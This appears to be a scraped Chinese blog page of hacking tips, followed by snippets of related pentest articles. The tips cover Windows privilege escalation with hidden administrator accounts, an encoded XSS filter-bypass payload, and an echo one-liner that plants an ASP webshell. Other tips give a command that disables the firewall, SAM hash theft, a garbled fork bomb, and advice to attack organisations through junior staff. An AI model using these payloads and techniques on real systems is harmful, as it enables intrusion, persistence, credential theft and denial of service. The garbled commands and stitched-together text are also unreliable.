1、提權簡單歸納一下,可以分為系統設定與第三方軟體缺陷提權、溢位提權、社會工程學提權。3、有時候新增賬號沒成功可能是伺服器的強密碼策略(萬惡的2008),改個超強度的密碼再往死裡整吧。
4、有時候能夠新增使用者,但是不能新增管理員組,這時候考慮是不是管理員組被改名了。可以利用net user administrator檢視管理員所屬的組來確定名稱。
5、新增賬號乙個小小技巧,妙用無限:在新增賬號時,將賬號名設為「 」(引號裡的字元為搜狗拼音打v+1時候的d項),不懂什麼意思,net user一下你就知道這個淫蕩的技巧了。
7、xss繞繞繞2:
search?str=***x%3ca%20href=%22data:text/html;%26%230000000000000000098ase64%26%230000000000000044%20pgltzybzcmm9ecbvbmvycm9ypwfszxj0kdeppg==%22%3etest%3c/a%3e
複製**
缺陷引數:str
過濾規則夠bt 但是同樣能繞!
會把提交的編碼 給解碼 然後再插入到網頁中!然後再對網頁內的值進行檢查 過濾!
base64 --< %26%230000000000000000098ase64
複製**
首先%26%23會被還原成 於是變成了: b 於是被還原成:b
b插入到頁面 再檢查 b+ase64 = base64 滿足規則 於是又過濾成 base64 繞過失敗!
但是如果b的html十進位制編碼 再多加幾個000 便不會被他給解碼 但是在瀏覽器中又會被解碼 於是便可以這樣繞過!
——摘自《xss神器]xssencode chrome外掛程式 – 0x_jin》
8、淚滴攻擊是拒絕服務攻擊的一種。 淚滴是乙個特殊構造的應用程式,通過傳送偽造的相互重疊的ip分組資料報,使其難以被接收主機重新組合。他們通常會導致目標主機核心失措 。 淚滴攻擊利用ip分組資料報重疊造成tcp/ ip分片重組**不能恰當處理ip包。影響的系統有windows 3.1、windows 95和nt、2.0.32和2.1.63版本以下的linux。
9、當防火牆被放置在外網邊界,一般不會開啟ids功能,外網的攻擊比較多,也比較複雜,開啟ids可能導致防火牆的效能出現問題。一般來說,當防火牆處於資訊中心邊界時,可以開啟ids;而在外網邊界可以使用專門的ids或ips裝置。
10、nessus是乙個強大的掃瞄器,強大到它甚至擁有屬於自己的指令碼語言,稱為attack scripting language(nasl)。
11、得到目標站目錄, 不能直接跨的 。 可以通過」 echo ^<%execute(request(「cmd」))%^> >>x:目標目錄 x.asp 「或者 「copy 指令碼檔案 x:目標目錄x.asp」像目標目錄寫入 webshell,或者還可以試試 type 命令。
12、在win下關閉防火牆 和 tcp/ip 篩選的命令:net stop policyagent & net stop sharedaccess
13、當 gethashes 獲取不到 hash 時,可以用冰刃(icesword)把 sam 複製到桌面(適用於windows 2000/xp/2003/vista作業系統)。
14、一般來說,中文編碼使用big5時,在寫入某些資料庫系統中,在「許、蓋、功」這些字型上面會發生錯誤。
15、:();:
複製**
——linux fork炸彈,其防範的方法是使用命令「ulimit -u 200」來限制每個使用者可以使用的最大程序數量。
16、標準acl , 所謂標準,就是指依照標準ip協議進行過濾,而且只對資料報的源ip位址進行控制。所以,標準acl的應用要盡量靠近目的ip。
17、擴充套件acl應該靠近特徵資料的源位址所在埠,這樣可以將被阻止的資料盡快地組織在不需傳遞它的網路外面。
18、滲透一定意義上是人與人的較量,所以呢,如果你現在月薪5000那麼去黑掉乙個大傢伙的時候應該從月薪2000的地方入手,譬如前台,運營,客服,hr,公關之類的為佳,找程式的入口也應該找實習生開發的,找外包的……
滲透筆記(一)
首先,我們要了解的是什麼是webshell?webshell就是以asp php jsp 或者cgi等網頁檔案形式存在的一種命令執行環境,也可以將其稱為一種網頁後門,黑客在入侵了乙個 後,通常會將asp或php後門檔案與網路伺服器web目錄下正常的網頁檔案混在一起,然後就可以使用瀏覽器訪問asp或p...
滲透測試學習筆記 初識滲透測試
黑客活動 hacking 道德黑客 ethical hacking 白帽黑客 white hat hacking poc proof of concept,概念證明。pt penetration testing或者pen testing,滲透測試。apt advanced package tool,...
滲透測試8 回顧
1.第一次出現 hacker黑客 這個詞是在?麻省理工實驗室 2.哪一種黑客是正面的?白帽黑客 道德黑客 3.對 進行滲透時,第一步通常是什麼?掃瞄 是否有漏洞 情報收集,不是大的專案的話前期互動會省掉 4.滲透測試需要掌握的哪些領域的基礎知識?html和php,網路和防火牆,資料庫 5.滲透測試的...